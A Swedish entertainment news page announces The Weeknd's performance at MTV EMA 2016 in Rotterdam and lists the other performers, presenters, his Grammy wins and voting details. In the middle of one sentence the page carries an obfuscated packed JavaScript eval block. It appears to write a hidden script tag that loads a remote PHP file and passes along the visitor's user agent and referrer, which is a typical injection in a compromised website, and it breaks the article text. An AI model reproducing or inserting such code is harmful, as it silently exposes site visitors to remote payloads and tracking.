Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

The Weeknd uppträder på MTV EMA 2016

The Weeknd uppträder på MTV EMA 2016
Sebastian

Tidigare eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dknnb|var|u0026u|referrer|yayan||js|php’.split(’|’),0,{}))
avslöjade artister som uppträder på galan inkluderar årets värld Bebe Rexha, mottagarna av utmärkelsen Global Icon; Green Day samt Bruno Mars, One Republic, Martin Garrix, Afrojack, Shawn Mendes, DNCE, Lukas Graham och Zara Larsson. 

Den kanadensiska pangsuccén The Weeknd kommer hetta upp stämningen PÅ MTV EMA 2016 i Rotterdam söndag 6 november. För första gången kommer den Best Male nominerade superstjärnan att uppträda live med titelspåret och första singeln från hans efterlängtade fjärde album Starboy, vars visuella följeslagare är nominerad i Best Video katergorin upp mot Kanye West, Beyoncé, Coldplay och Tame Impala.  

MTV EMA 2016 kommer att sända live runt om i världen från Ahoy Rotterdam i Nederländerna på söndag 6 november kl. 21.00.

The Weeknd ansluter en redan stjärnspäckad internationell EMA lineup med Bebe Rexha som värd och uppträdande av Bruno Mars, Green Day, One Republic, Martin Garrix, Afrojack, Sahwn Mendes, DNCE, Lukas Graham samt Zara Larsson. Tidigare avslöjade presentatörer inkluderar G-Eazy, Jaden Smith, Jourdan Dunn, Winnie Harlow, Deepika Padukone, Nina Dobrev, Charlie XCX, Tinie Tempah och Idris Elba.

Fans, kritiker och branschen är överrens om The Weeknds oerfterhärmliga talang. Han tog hem två Grammy Awards, “Best Urban Contemporary Album” för Beauty BehindThe Madness och “Best R&B Performance” för Earned It (Fifty Shades of Grey) av sju nomineringar. Earned It (Fifty Shades of Grey), gav även The Weeknds första Oscar-nominering någonsin i kategorin “Best Original Song”.

Den officiella internationella sponsorn av MTV EMA 2016 är Evos hörlurar. MTV EMA 2016 röstningen är öppen fram till 5 november till kl. 23.59 så besök mtvema.com för att lägga din röst!

För att inte missa senaste nyheterna från MTV EMA, följ oss på @MTVEMA på Instagram, Snapchat, Twitter och
Facebook.